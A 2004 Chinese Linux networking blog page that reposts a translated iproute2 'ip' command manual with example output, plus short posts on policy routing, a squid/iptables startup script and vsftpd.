get命令在必要时会派生出新的路由。输出格式这个命令的输出格式和ip route ls相同。示例搜索到193.233.7.82的路由 kuznet@amber:~ $ ip route get 193.233.7.82193.233.7.82 dev eth0 src 193.233.7.65 realms inr.ac cache mtu 1500 rtt 300kuznet@amber:~ $搜索目的地址是193.233.7.82，来自193.233.7.82，从eth0设备到达的路由（这条命令会产生一条非常有意思的路由，这是一条到193.233.7.82的回环路由） kuznet@amber:~ $ ip r g 193.233.7.82 from 193.233.7.82 iif eth0193.233.7.82 from 193.233.7.82 dev eth0 src 193.233.7.65 realms inr.ac/inr.ac cache <src-direct,redirect> mtu 1500 rtt 300 iif eth0kuznet@amber:~ $获得一个多播路由，数据包来自主机193.233.7.82，从eth0设备进入，目的地址是多播组地址224.2.127.254（需要运行多播路由监控程序pimd）。这个命令产生的路由与上面的不大相同，它包含常规部分和多播部分。常规部分用于把数据包投递到本地ip监控程序。这里，本地地址不是多播组的成员，因此这个路由没有local标记，只用于转发数据包。这个路由的输出设备是回环设备。多播部分包含额外的输出接口。 kuznet@amber:~ $ ip r g 224.2.127.254 from 193.233.7.82 iif eth0multicast 224.2.127.254 from 193.233.7.82 dev lo src 193.233.7.65 realms inr.ac/cosmos cache <mc> iif eth0 Oifs: eth1 pimregkuznet@amber:~ $ 下面我们举一个复杂一些的例子。我们首先为一个目标地址添加一个无效的网关路由，而实际上和这个地址是直连的。 netadm@alisa:~ # ip route add 193.233.7.98 via 193.233.7.254netadm@alisa:~ # ip route get 193.233.7.98193.233.7.98 via 193.233.7.254 dev eth0 src 193.233.7.90 cache mtu 1500 rtt 3072netadm@alisa:~ # 然后，我们ping一下193.233.7.98: netadm@alisa:~ # ping -n 193.233.7.98PING 193.233.7.98 (193.233.7.98) from 193.233.7.90 : 56 data bytesFrom 193.233.7.254: Redirect Host(New nexthop: 193.233.7.98)64 bytes from 193.233.7.98: icmp_seq=0 ttl=255 time=3.5 msFrom 193.233.7.254: Redirect Host(New nexthop: 193.233.7.98)64 bytes from 193.233.7.98: icmp_seq=1 ttl=255 time=2.2 ms64 bytes from 193.233.7.98: icmp_seq=2 ttl=255 time=0.4 ms64 bytes from 193.233.7.98: icmp_seq=3 ttl=255 time=0.4 ms64 bytes from 193.233.7.98: icmp_seq=4 ttl=255 time=0.4 ms^C--- 193.233.7.98 ping statistics ---5 packets transmitted, 5 packets received, 0% packet lossround-trip min/avg/max = 0.4/1.3/3.5 msnetadm@alisa:~ # 输出结果可以看出，路由器193.233.7.254知道有更好的路由，因此送回一个ICMP重定向信息。然后，我们再看看路由表的情况： netadm@alisa:~ # ip route get 193.233.7.98193.233.7.98 dev eth0 src 193.233.7.90 cache <redirected> mtu 1500 rtt 3072netadm@alisa:~ # 【责任编辑：nixe0n】--Contact Information: ***** ******* <windtear@ipcn.org> +86-10-6277**** **#*** Tsinghua University Beijing, 100084 CN[m[1;35m※ 来源:·BBS 水木清华站 smth.edu.cn·[FROM: 166.111.154.100][m More...

Posted by windtear at 1:38 AM

2. ip usage 1 - iproute2 - the most powerful tool - [FWD] ip命令手册(一) 我爱网络

发信人: CrazyKid (疯狂小子※爱学习/爱生活), 信区: Linux 标题: [FWD] ip命令手册(一)发信站: BBS 水木清华站 (Tue Oct 15 23:21:06 2002), 站内信件http://linuxaid.com.cn/articles/3/2/325173459.shtmlip命令手册(一)摘要 ip是iproute2软件包里面的一个强大的网络配置工具，它能够替代一些传统的网络管理工具。例如：ifconfig、route等。这个手册将分章节介绍ip命令及其选项。本文的原文在 http://defiant.coinet.com/iproute2/ip-cref/(2002-10-15 18:40:46)------------------------------------------------------------------------By nixe0n作者：Alexey N.Kuznetsov编译：nixe0n1.关于这篇文档2.ip命令的语法3.ip的错误信息4.ip link--配置网络设备4.1.ip link set--改变设备的属性4.2.ip link show--显示设备属性5.ip address--协议地址管理5.1.ip address add--添加一个新的协议地址5.2.ip address delete--删除一个协议地址5.3.ip address show--显示协议地址5.4.ip address flush--清除协议地址6.ip neighbour--neighbour/arp表管理命令6.1.ip neighbour add -- 添加一个新的邻接条目 ip neighbour change--修改一个现有的条目 ip neighbour replace--替换一个已有的条目6.2.ip neighbour delete--删除一个邻接条目6.3.ip neighbour show--显示网络邻居的信息6.4.ip neighbour flush--清除邻接条目1.关于这篇文档 ip是iproute2软件包里面的一个强大的网络配置工具，本文将分章节介绍ip命令及其选项。为了便于理解，作者在本文中列举了很多示例。但是，正如作者所说，这不是一个教程，而是一个使用手册。2.ip命令的语法 ip命令的用法如下：ip [OPTIONS] OBJECT [COMMAND [ARGUMENTS]] 其中，OPTIONS是一些修改ip行为或者改变其输出的选项。所有的选项都是以-字符开头，分为长、短两种形式。目前，ip支持如下选项：-V,-Version 打印ip的版本并退出。 -s,-stats,-statistics 输出更为详尽的信息。如果这个选项出现两次或者多次，输出的信息将更为详尽。 -f,-family 这个选项后面接协议种类，包括：inet、inet6或者link，强调使用的协议种类。如果没有足够的信息告诉ip使用的协议种类，ip就会使用默认值inet或者any。link比较特殊，它表示不涉及任何网络协议。 -4 是-family inet的简写。 -6 是-family inet6的简写。 -0 是-family link的简写。 -o,-oneline 对每行记录都使用单行输出，回行用字符代替。如果你需要使用wc、grep等工具处理ip的输出，会用到这个选项。 -r,-resolve 查询域名解析系统，用获得的主机名代替主机IP地址。 OBJECT是你要管理或者获取信息的对象。目前ip认识的对象包括：link 网络设备 address 一个设备的协议（IP或者IPV6）地址 neighbour ARP或者NDISC缓冲区条目 route 路由表条目 rule 路由策略数据库中的规则 maddress 多播地址 mroute 多播路由缓冲区条目 tunnel IP上的通道另外，所有的对象名都可以简写，例如：address可以简写为addr，甚至是a。 COMMAND设置针对指定对象执行的操作，它和对象的类型有关。一般情况下，ip支持对象的增加(add)、删除(delete)和展示(show或者list)。有些对象不支持所有这些操作，或者有其它的一些命令。对于所有的对象，用户可以使用help命令获得帮助。这个命令会列出这个对象支持的命令和参数的语法。如果没有指定对象的操作命令，ip会使用默认的命令。一般情况下，默认命令是list，如果对象不能列出，就会执行help命令。 ARGUMENTS是命令的一些参数，它们倚赖于对象和命令。ip支持两种类型的参数：flag和parameter。flag由一个关键词组成；parameter由一个关键词加一个数值组成。为了方便，每个命令都有一个可以忽略的默认参数。例如，参数dev是ip link命令的默认参数，因此ip link ls eth0等于ip link ls dev eth0。我们将在后面的章节详细介绍每个命令的使用，命令的默认参数将使用default标出。几乎所有的关键词都可以简写为前几个字母。在交互工作时，简写的方式非常方便，但是我们不建议在脚本中使用简写形式。另外，在讲述过程中，所有的“官方”简写方式都会在文章中列出。3.ip的错误信息由于以下原因，ip可能会操作失败：命令行语法错误：一个未知的关键词(an unknown keyword)；错误的IP地址格式(incorrectly formated IP address)。在这种情况下，ip会打印出错误信息然后退出，在错误信息中会包含失败的原因。有时ip也会打印帮助信息。参数不能通过一致性校验。由于用户没有提供足够的信息，造成ip无法从参数中编译出内核请求。内核返回某些系统调用的错误。ip使用perror(3)输出错误信息，因此输出的错误信息包含一段注释以及系统调用号。内核返回RTNETLINK请求错误。这类错误信息以"RTNETLIK answers"开头。 ip的所有操作都是原子操作。例如，如果ip执行失败，它不会系统的任何东西，ip link command例外，它会修改某些设备参数。我们无法列出所有的错误信息，尤其是语法错误。不过，错误信息的意思都非常明确。下面，我们列举一些经常出现的错误信息：内核不支持netlink(netlink用于在内核模块和用户之间传递信息)，会出现以下错误信息： Cannot open netlink socket: Invalid value 内核不支持RTNETLINK，会出现以下错误信息： Cannot talk to rtnetlink: Connect refusedCannot send dump request: Connect refused 如果在编译内核时没有配置CONFIG_IP_MULTIPLE_TABLES选项。在使用ip规则时会出现和下面的信息类似的错误信息： kuznet@kaise $ ip rule listRTNETLINK error: Invalid argumentdump terminated 4.ip link--配置网络设备对象 link由网络设备，对应的命令显示以及设备的状态变化组成。命令 set和show(或者list) 4.1.ip link set--改变设备的属性缩写：set、s参数：dev NAME(default) 指定进行操作的网络设备 up/down 起动／关闭设备。例如：ip link set dev eth0 up arp on/off 改变网络设备的NOARP选项。如果设备处于UP状态，不允许进行这个操作。不过，内核和ip都不会对在这种情况下的这个操作进行检查。在设备处于运行状态下改变这个选项会造成无法预料的后果。 multicast on/off 改变网络设备的MULTICAST选项。 dynamic on/off 改变网络设备的DYNAMIC选项。 name NAME 把设备的名字改为NAME(例如：eth0)。如果设备处于运行状态或者已经配置了地址，建议不要进行这个操作。 txqueuelen NUMBER或者txqlen NUMBER 改变设备传输队列的长度。例如：ip link set dev eth0 txqueuelen 100 mtu NUMBER 改变网络设备MTU(最大传输单元)的值。例如：ip link set dev eth0 mtu 1500 address LLADDRESS 修改网络设备的MAC地址。例如：ip link set dev eth0 address 00:01:4f:00:15:f1 broadcat LLADDRESS或者brd LLADDRESS 修改数据链路层广播地址。注意：对于大多数的网络设备(例如：以太网)，修改链路层广播地址会对网络造成破坏。因此，如果对此没有很深的理解，最好不要使用这个操作。 peer LLADDRESS 当使用点对点连接时，使用这个操作可以修改对端的数据链路层地址。注意：ip不能修改PROMISC或者ALLMULTI选项。这两个选项已经比较陈旧，而且也不应该随便修改。注意：如果同时修改多个参数，任何一个修改失败，ip都会立即取消操作。这种情况可能使系统进入无法预料的状态。为了避免出现这种情况，尽量不要使用ip link set同时修改多个参数，例如：ip link set dev eth0 mtu 1500 txqueuelen 100。4.2.ip link show--显示设备属性缩写：show、list、lst、sh、ls、l参数dev NAME(default) NAME指定网络设备名称，例如：eth0。如果省略了这个参数，所有的设备属性就都会被列出。 up 只显示处于活动状态网络接口的信息。输出格式kuznet@alisa:~ $ ip link ls eth03: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc cbq qlen 100 link/ether 00:a0:cc:66:18:78 brd ff:ff:ff:ff:ff:ff:kuznet@alisa:~ $ ip link ls sit05: sit0@NOME: <NOARP,UP> mtu 1480 qdisc noqueue link/sit 0.0.0.0 brd 0.0.0.0kuznet@alisa:~ $ ip link ls dummy2: dummy: <BROADCAST,NOARP> mtu 1500 qdisc noop link/ether 00:00:00:00:00:00 brd ff:ff:ff:ff:ff:ffkuznet@alisa:~ $ 在显示的信息中，每个引号之前的数字是一个接口索引，用于识别网络接口。这个数字后面是网络接口的名字(例如：eth0、dummy等)，它也和网络接口一一对应。不过，在某些情况下，例如：驱动模块被卸载，对应的接口名就会从列表中消失，而其它新创建的接口就会使用相同的名字。系统管理员可以ip link set name修改接口的名字。接口名可以是别的,或者是@NONE。这意味着这个设备被绑定到其它的设备，例如数据包被发送到这个设备，由这个设备封装，并从master设备发出。如果设备名字是NONE，就表示master设备是未知的。接着，我们看到的是mtu(Maximal Transfer Unit,最大传输单元)。它决定这个接口单个数据包能够传输多少数据。 qdisc(queuing discipline)显示这个网络接口使用的排队算法。noqueue表示不对数据包进行排队；noop表示这个网络接口出于黑洞模式，也就是所有进入本网络设备的数据会直接被丢弃。qlen是网络接口传输队列的默认长度。网络接口可以有如下标志：UP 这个设备处于运行状态，可以接收、发送数据包。 LOOPBACK 这个接口不能用于和其它的主机通讯，所有发送到这个接口的数据包都会返回，而且这种接口只能接收反弹回来的数据包。 BROADCAST 这个设备具有把数据包发送到所有主机的能力。以太网连接是一个很典型的例子。 POINTTOPOINT 两个节点之间是直接连接的。某个接点发出的所有数据包都会发到对端节点，接收到的所有数据包也都是从对端节点发过来的。 MULTICAST 这个标志表示设备具有多播能力，能够把数据包发送到某些相邻的网络节点。实际上，广播是多播的一个特例，它的多播组包括连接上的所有节点。从定义上，POINTTOPOINT和BROADCAST连接都属于多播。 *如果网络接口的标志不属于LOOPBACK、BROADCAST和POINTTOPOINT的任何一个，就假定是NMBA(Non-Broadcast Multi-Access)类型。这是最为普遍的一个标志。PROMISC 设备处于混杂模式，接收连接上的所有数据，不管目的地址是否是自己。通常，这种模式主要用于网桥和网络监视。 ALLMULTI 设备接收连接上的所有多播数据包，多播路由器(muliticast router)使用这种模式。 NOARP 这个标志和其它的标志不同，它的含义和涉及的网络协议有关。它一般表示这个设备无需地址解析，软件或者硬件不必借助于系统协议栈的帮助就知道如何把数据包投递到目的地。 DYNAMIC 这个标志表示这个网络接口是动态建立和撤消的。 SLAVE 表示这个接口被绑定到其它的网络接口。 *除此之外，还有其它一些标志。这些标志或者已经过时(例如：NOTRAILERS)，或者还没有实现(如：DEBUG)，或者只是特定于某些设备(例如：MASTER、AUTOMEDIA、PORTSEL)。因此，在此我们不作讨论。 *对于PROMISC和ALLMULTI标志，ifconfig和ip显示的值是不同的。ip link ls命令显示的是设备的真正状态，而ifconfig显示的是自己设置的虚拟设备状态。显示信息的第二行包含和链路层地址(MAC地址)相关的信息。其中，第一个词(ether、sit)定义接口的硬件类型。而接口的硬件类型又决定MAC地址的格式和语法。默认的格式是硬件的MAC地址和广播地址(如果是点对点连接方式，就是对端的地址)，地址是用冒号隔开的16进制数字。不过，默写类型的连接有其特定的地址格式，例如：IP通道的地址格式是用点分开的IP地址。 NBMA(Non-Broadcast Multi-Access)连接没有明确定义的广播地址和对端地址。不过，这个域包含一些有用的信息，例如：倚赖于ARP服务器的广播地址。使用这个命令不会显示多播地址，需要使用ip maddr ls命令。详情请参考第9节ip maddr ls。统计信息使用-statistics选项，ip命令会打印出网络接口的统计信息，例如：kuznet@alisa:~ $ ip -s link ls eth03: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc cbq qlen 100 link/ether 00:a0:cc:66:18:78 brd ff:ff:ff:ff:ff:ff RX: bytes packets errors dropped overrun mcast 2449949362 2786187 0 0 0 0 TX: bytes packets errors dropped carrier collsns 178558497 1783946 332 0 332 35172kuznet@alisa:~ $ RX:和TX:分别是接收和发送统计信息的开头。得到的统计信息包括：bytes 网络接口发送或者收到的字节数。如果字节数超过数据类型能够表示的最大数值，就会造成回卷。因此，你如果想连续监视这个指标，需要一个用户空间的监控进程周期性地保存这个数据。 packets 网络接口收到或者发送的数据包个数。 errors 发生错误的次数。 dropped 由于系统资源限制，而丢弃数据包的数量。 overrun 由于发生堵塞，收到的数据包被丢弃的数量。如果接口发生堵塞，就意味着内核或者你的机器太慢，无法处理收到的数据。 mcast 收到的多播数据包数量，只有很少的设备支持这个选项。 carrier 连接介质出现故障的次数，例如：网线接触不好。 collsns 以太网类型介质发生冲突的事件次数。 compressed 压缩数据包的总数。这个指标只适用于使用VJ头压缩的网络接口。如果-s选项出现两次或者更多次，ip会输出更为详细的错误信息统计。kuznet@alisa:~ $ ip -s -s link ls eth03: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc cbq qlen 100 link/ether 00:a0:cc:66:18:78 brd ff:ff:ff:ff:ff:ff RX: bytes packets errors dropped overrun mcast 2449949362 2786187 0 0 0 0 RX errors: length crc frame fifo missed 0 0 0 0 0 TX: bytes packets errors dropped carrier collsns 178558497 1783946 332 0 332 35172 TX errors: aborted fifo window heartbeat 0 0 0 332kuznet@alisa:~ $ 这些错误的名字是纯以太化的，对于其它种类的设备，这些域可能有不同的解释。5.ip address--协议地址管理缩写 address、addr、a 对象这里的地址是绑定到网络设备上的协议(IP或者IPv6)地址。每个网络设备至少应该有一个协议地址。而且，一个网络设备可以绑定多个协议地址。ip addr命令能够显示网络设备的协议地址及其性质，添加新的地址，删除旧的地址。命令 add、delete、flush和show(或者list) 5.1.ip address add--添加一个新的协议地址缩写：add、a参数dev NAME 被操作的设备名 local ADDRESS(default) 接口的地址，地址格式和协议有关。IPv4地址使用.进行分隔，而IPv6地址使用冒号分隔。ADDRESS可以跟着一个斜杠和表示掩码位数的十进制数字。 peer ADDRESS 点对点接口对端的地址。ADDRESS也可以跟着一个斜杠和表示掩码位数的十进制数字。 broadcast ADDRESS 接口的广播地址。为了方便，可以使用+和-(注1)代替广播地址。例如：ip addr add local 192.168.1.1/24 brd + dev eth0ip addr add local 192.168.1.1/28 brd - dev eth0 label NAME 为每个地址设置一个字符串作为标签。为了和Linux-2.0的网络别名兼容，这个字符串必须以设备名开头，接着一个冒号，例如：#ip addr add local 192.168.4.1/28 brd + label eth0:1 dev eth0 scope SCOPE_VALUE(注2) 设置地址的有效范围，它用于内核为数据包设置源地址。有效的范围在/etc/iproute2/tr_scopes文件列出，系统预先设定了一些范围值：global 这个地址全局有效。site 这个地址是局部连接，也就是只有目标地址是这个设备地址时，才有效。site (只适用于IPv6)地址在站点内部有效。host 地址在主机内部有效。 *注1：使用-，ip addr ls显示的是网络地址；使用+，ip addr ls显示的是广播地址。 *注2：有关scope，在附录A中有更为详细的解释。示例在回环设备上添加一个回环地址： #ip addr add 127.0.0.1/8 dev lo brd + scope host在以太网接口eth0上增加一个地址10.0.0.1，掩码长度为24位(155.155.155.0)，标准广播地址，标签为eth0:Alias： #ip addr add 10.0.0.1/24 brd + dev eth0 label eth0:Alias 5.2.ip address delete--删除一个协议地址缩写：delete、del、d参数这个命令的参数和ip addr add命令的参数一致。其中，只有设备名是必需的参数，其它都是可选的。如果没有给定除设备名之外的其它参数，ip就会删除这个设备的第一个地址。示例删除回环设备的一个回环地址。不过，最好不要作这种尝试。 #ip addr del 127.0.0.1/8 dev lo以下shell代码可以取消设备上的所有IP地址。 while ip -f inet add del dev eth0;do :nothingdone另外，可以使用ip addr flush命令取消IP地址 5.3.ip address show--显示协议地址缩写：show、list、lst、sh、ls、l参数dev NAME(default) 设备的名字 scope SCOPE_VAL 只列出这个范围的地址 to PREFIX 只列出和PREFIX匹配的地址，例如：ip addr ls to 192.168.1.1 label PATTERN 只列出标签匹配PATTERN的地址，PATTERN是一个shell风格的正则表达式。 dynamic和permanent 这两个参数只适用于IPv6。使用dynamic，ip就只列出动态地址；使用permanent，ip就只列出固定地址。 tentative 这个参数只适用于IPv6，只列出没有通过重复地址检测[参考2]的地址。 deprecated 这个参数只适用于IPv6，只列出deprecated[参考2]地址。 primary和secondary 只列出主(primary)或从(secondary)地址。输出格式duznet@alisa:~ $ ip addr ls eth03: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc cbq qlen 100 link/ether 00:a0:cc:66:18:78 brd ff:ff:ff:ff:ff:ff inet 193.233.7.90/24 brd 193.233.7.255 scope global eth0 inet6 3ffe:2400:0:1:2a0:ccff:fe66:1878/64 scope global dynamic valid_lft forever preferred_lft 604746sec inet6 fe80::2a0:ccff:fe66:1878/10 scope linkduznet@alisa:~ $ 输出的头两行和ip link ls的输出是相同的。接着是IP和IPv6地址、广播地址以及其它的地址属性：范围(scope)、标志(flag)和标签(label)。地址标志由内核设置，系统管理员不能修改。目前，内核定义了以下标志：secondary 为输出的数据包选择默认源地址时，内核不使用这个地址。如果一个设备已经有了一个地址，又给它设置了同一网段的不同地址，第二个地址就成为从(secondary)地址。例如：eth0已经有一个地址192.168.1.108/24，如果又给它一个地址192.168.1.3/24，192.168.1.3/24的就会被内核标记为从地址。 dynamic 这个地址是通过无状态的自动配置建立的(stateless autoconfiguration)[参考2]。如果地址仍然有效，在输出中，还包括两个时间信息。preferred_lft期满后，地址就会变成deprecated状态；valiid_lft期满后，地址将失效。 deprecated 这个地址是不允许的，也就是说，地址虽然有效，但是不能使用它建立新的连接。 tentative 由于重复地址监测[参考2]还没有完成或者监测失败，这个地址不能使用。 5.4.ip address flush--清除协议地址缩写：flush、f简介这个命令可以清除按照某种条件选择的协议地址。参数这个命令的参数和ip address show相同。唯一的区别是，如果不给定参数它什么都不会做。警告这个命令(和后面讨论的所有flush命令)非常危险。如果出现错误，将无法恢复，它会清除被操作的地址。statistics选项如果在ip addr flush命令中使用了-statistics选项，命令将输出更为详尽的信息。输出的信息包括删除地址的数目和清理地址列表的圈数。如果使用了两次-s选项，ip addr flush会按照上节叙述的格式输出所有被删除的地址。示例删除属于私网10.0.0.0/8的所有地址： netadm@amber:~ # ip -s -s a f to 10/82: dummy inet 10.7.7.7/16 brd 10.7.255.255 scope global dummy3: eth0 inet 10.10.7.7/16 brd 10.10.255.255 scope global eth04: eth1 inet 10.8.7.7/16 brd 10.8.255.255 scope global eth1*** Round 1,deleting 3 addresses ****** Flush is complete after 1 round ***netadm@amber:~ #取消所有以太网卡的IP地址 netadm@amber:~ # ip -4 addr flush label "eth0"最后一个例子是对IPv6地址的操作。在启动了转发或者关闭了自动配置之后，你需要取消通过无状态地址自动配置获得的主机地址： netadm@amber:~ # ip -6 addr flush dynamic 6.ip neighbour--neighbour/arp表管理命令缩写 neighbour、neighbor、neigh、n 对象邻接(neighbour)对象实现同一网段协议地址和链路层地址的绑定。在内核中，这些条目被组织到表中。IPv4的相邻表也被叫做ARP表。ip neighbour命令支持对条目及其属性的显示、添加和删除。命令 add、change、replace、delete、fulsh、show(或者list) 附录B将详细描述如何使用ip管理代理ARP/NDISC。6.1.ip neighbour add -- 添加一个新的邻接条目 ip neighbour change--修改一个现有的条目 ip neighbour replace--替换一个已有的条目缩写：add、a；change、chg；replace、repl简介：这三个命令用来建立一个邻接表的条目或者更新现有的邻接表条目。参数to ADDRESS(default) 相邻的协议地址。可以是IPv4或者IPv6。 dev NAME 和相邻节点连接的设备。 lladdr LLADDRESS 邻居的链路层地址。LLADDRESS可以为空。 nud NUD_STATE 邻接条目的状态。nud是Neighbour Unreachability Detection的缩写。可能的状态包括：permanent--邻接条目永远有效并且只能由管理员删除。noarp--邻接条目有效，不必对其有效性进行确认。在其生命期期满时会被删除。reachable--在超时时间之内，这个邻接条目是有效的。stale--这个邻接条目是有效的，但是比较可疑。如果条目是有效的，ip neigh不会改变邻接状态，也不会修改其地址。示例在设备eth0上，为地址10.0.0.3添加一个permanent ARP条目： ip neigh add 10.0.0.3 lladdr 0:0:0:0:0:1 dev eth0 nud perm把状态改为reachable ip neigh chg 10.0.0.3 dev eth0 nud reachable 6.2.ip neighbour delete--删除一个邻接条目缩写：delete、del、d简介这个命令用来删除一个邻接条目参数这个命令的参数和ip neigh add命令的相同，只不过lladdr和nud将被忽略。示例删除设备eth0上的一个ARP条目10.0.0.3 ip neigh del 10.0.0.3 dev eth0 执行了删除命令之后，被删除的条目不会马上消失，它会在系统的下次垃圾收集时被删除。如果被操作的条目正在使用，将不能被删除。警告如果试图删除或者手工修改一个由内核建立的noarp条目，会导致一些不可预知的行为。6.3.ip neighbour show--显示网络邻居的信息缩写：show、list、sh、ls简介这个命令用于显示网络邻居信息。参数to ADDRESS(default) 指定要显示的地址 dev NAME 只显示设备NAME的邻居 unused 只显示当前没有使用的邻居 nud NUD_STATE 只列出处于NUD_STATE状态的邻接条目。NUD_STATE的值下面将会介绍。nud all表示所有的状态。这个选项可以使用多次。如果缺少这个选项，ip会列出除none和noarp状态的所有条目。输出格式duznet@alisa:~ $ ip neigh ls:: dev lo lladdr 00:00:00:00:00:00 nud noarpfe80::200:cff:fe76:3f85 dev eth0 lladdr 00:00:0c:76:3f:86 router nud stale0.0.0.0 dev lo lladdr 00:00:00:00:00:00 nud noarp193.233.7.254 dev eth0 lladdr 00:00:0c:76:3f:85 nud reachable193.233.7.85 dev eth0 lladdr 00:e0:1e:63:39:00 nud stalekuznet@alisa:~ $ 每行的第一部分是网络邻居的协议地址。第二部分是设备名。省下的部分是这个邻接条目的信息。 lladdr是这个设备的链路层地址。 nud是条目代表连接的状态。下面是状态的完整列表和简单描述：none 网络邻居的状态为空。 incomplete 这个邻居正在被解析。 reachable 网络邻居有效并且可达。 stale 邻居有效，但是可能不可达。因此，内核将在首次传输时进行检查。 delay 一个数据包已经发到处于stale的网络邻居,内核在等待应答信息。 probe delay计时器过期，还没有收到确认信息。内核开始使用ARP/NDISC消息包探测这个网络邻居。 failed 解析失败。 noarp 网络邻居有效，不必检查。 permanent 这是一个noarp条目，只有系统管理员可以从邻接表中把它删除。在这些状态中，除了none、faliled和incomplete. IPVv6网络邻居可以有一个叫做router的标志，它表示这个节点是一个IPv6路由器。-statistics -statistics选项可以显示很多有用的信息。例如：kuznet@alisa:~ $ ip -s n ls 193.233.7.254193.233.7.254. dev eth0 lladdr 00:00:0c:76:3f:85 ref 5 used 12/13/20 nud reachablekuznet@alisa:~ $ 输出信息里面多了ref和用斜缸分开的三个时间。ref表示有多少用户使用这个条目；三个时间分别是使用时间、确认时间和刷新时间。因此，上面输出中的时间表示：条目12秒之前刚刚使用过； 13秒之前被确认； 20秒之前被更新。 6.4.ip neighbour flush--清除邻接条目缩写：flush、f简介这个命令用来清除符合某个条件的邻接表条目。参数这个命令的参数和ip neigh sh相同。不同之处是，如果没有参数，它什么也不会做。而且，默认情况下，被删除的条目不包括处于permanent和noarp状态的条目。-statistics 使用了-statistics选项，这个命令的输出将更为详尽。它会输出删除的条目数和清除邻接表遍历的次数。如果使用了两个-s选项，命令的输出将包括被删除条目的信息。示例netadm@alisa:~ # ip -s -s n f 193.233.7.254193.233.7.254 dev eth0 lladdr 00:00:0c:76:3f:85 ref 5 used 12/13/20 nud reachable*** Round 1,deleting 1 entries ****** Flush is complete after 1 round ***netadm@alisa:~ #--Contact Information: ***** ******* <windtear@ipcn.org> +86-10-6277**** **#*** Tsinghua University Beijing, 100084 CN[m[1;34m※ 来源:·BBS 水木清华站 smth.edu.cn·[FROM: 166.111.154.88][m More...

Posted by windtear at 1:38 AM

1. ip rule - iproute2 - the most powerful tool 我爱网络

% rpm -qil iprouteName : iproute Relocations: (not relocateable)Version : 2.4.7 Vendor: Red Hat, Inc.Release : 7.73.1 Build Date: Tue 04 Nov 2003 12:09:59 AM CSTInstall date: Tue 23 Dec 2003 01:43:50 AM CST Build Host: stripples.devel.redhat.comGroup : Applications/System Source RPM: iproute-2.4.7-7.73.1.src.rpmSize : 940710 License: GNU GPLPackager : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>Summary : Advanced IP routing and network device configuration tools.Description :The iproute package contains networking utilities (ip and rtmon, forexample) which are designed to use the advanced networkingcapabilities of the Linux 2.2.x kernel./etc/iproute2/etc/iproute2/rt_dsfield/etc/iproute2/rt_protos/etc/iproute2/rt_realms/etc/iproute2/rt_scopes/etc/iproute2/rt_tables/sbin/ifcfg/sbin/ip/sbin/rtmon/sbin/tc/usr/sbin/rtacct/usr/share/doc/iproute-2.4.7/usr/share/doc/iproute-2.4.7/README.decnet/usr/share/doc/iproute-2.4.7/README.iproute2+tc/usr/share/doc/iproute-2.4.7/RELNOTES/usr/share/doc/iproute-2.4.7/api-ip6-flowlabels.ps/usr/share/doc/iproute-2.4.7/examples/usr/share/doc/iproute-2.4.7/examples/SYN-DoS.rate.limit/usr/share/doc/iproute-2.4.7/examples/cbqinit.eth1/usr/share/doc/iproute-2.4.7/examples/dhcp-client-script/usr/share/doc/iproute-2.4.7/examples/diffserv/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge1/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge2/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge31-ca-u32/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge31-cb-chains/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge32-ca-u32/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge32-cb-chains/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge32-cb-u32/usr/share/doc/iproute-2.4.7/examples/diffserv/README/usr/share/doc/iproute-2.4.7/examples/diffserv/afcbq/usr/share/doc/iproute-2.4.7/examples/diffserv/ef-prio/usr/share/doc/iproute-2.4.7/examples/diffserv/efcbq/usr/share/doc/iproute-2.4.7/examples/diffserv/regression-testing/usr/share/doc/iproute-2.4.7/ip-cref.ps/usr/share/doc/iproute-2.4.7/ip-tunnels.ps/usr/share/man/man8/ip.8.gz-----> a sample% cat /etc/iproute2/rt_tables ## reserved values##255 local#254 main#253 default#0 unspec## local##1 inr.ruhep210 cenpok220 lab% tail ....sh# adv route$IP route add default via a.b.c.d src h.i.j.k dev cenpok table cenpok$IP rule add from h.i.j.k table cenpok$IP route add default via a.b.c.e src h.i.j.l dev lab table lab$IP rule add from h.i.j.l table lab$IP route flush cache-----> view the fact% ip rule ls0: from all lookup local 32764: from h.i.j.l lookup lab 32765: from h.i.j.k lookup cenpok 32766: from all lookup main 32767: from all lookup 253 % ip route ls table cenpok default via a.b.c.d dev cenpok src h.i.j.k % ip route ls table lab default via a.b.c.e dev lab src h.i.j.l More...

Posted by windtear at 1:35 AM

April 3, 2004

squid maintain sample . chaotic sample:( 我爱网络

/etc/rc.d/rc3.d S25squid -> ../init.d/squid/etc/rc.d/rc.localIPTABLES=/sbin/iptables$IPTABLES -N squid$IPTABLES -t filter -A INPUT -j squid -p tcp --dport $PORT# auto denytail -f /opt/old_access/access.log | /opt/old_access/autodeny.pl &sh /etc/rc.d/_squid_deny.sh &echo "1" > /proc/sys/net/ipv4/ip_forwardecho "1" > /proc/sys/net/ipv4/tcp_syncookiesMODPROBE=/sbin/modprobe$MODPROBE ip_nat_ftp$MODPROBE ip_nat_irc$MODPROBE ip_conntrack$MODPROBE ip_conntrack_ftp$MODPROBE ip_conntrack_irc$MODPROBE iptable_filter $MODPROBE iptable_nat $MODPROBE ip_tables$MODPROBE ipt_MASQUERADEsh /etc/rc.d/_nat_use.sh^sh /etc/rc.d/_squid.sh^$IPTABLES -t nat -A PREROUTING -s 192.168.0.0/16 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports $PORT More...

Posted by windtear at 10:03 PM

April 2, 2004

vsftpd - probably the most secure and fastest FTP server for UNIX-like systems 我爱网络

vsftpd - probably the most secure and fastest FTP server for UNIX-like systems http://vsftpd.beasts.org/ vsftpd is a GPL licensed FTP server for UNIX systems, including Linux. It is secure and extremely fast. It is stable. Don't take my word for it, though. Below, we will see evidence supporting all three assertions. We will also see a list of a few More...

Posted by windtear at 10:12 PM

网络技术/Linux/自由、协作、创造－为了明天/个人原创整理

April 30, 2004

April 29, 2004

April 28, 2004

April 27, 2004

April 26, 2004

April 25, 2004

April 23, 2004

April 21, 2004

April 20, 2004

April 19, 2004

April 18, 2004

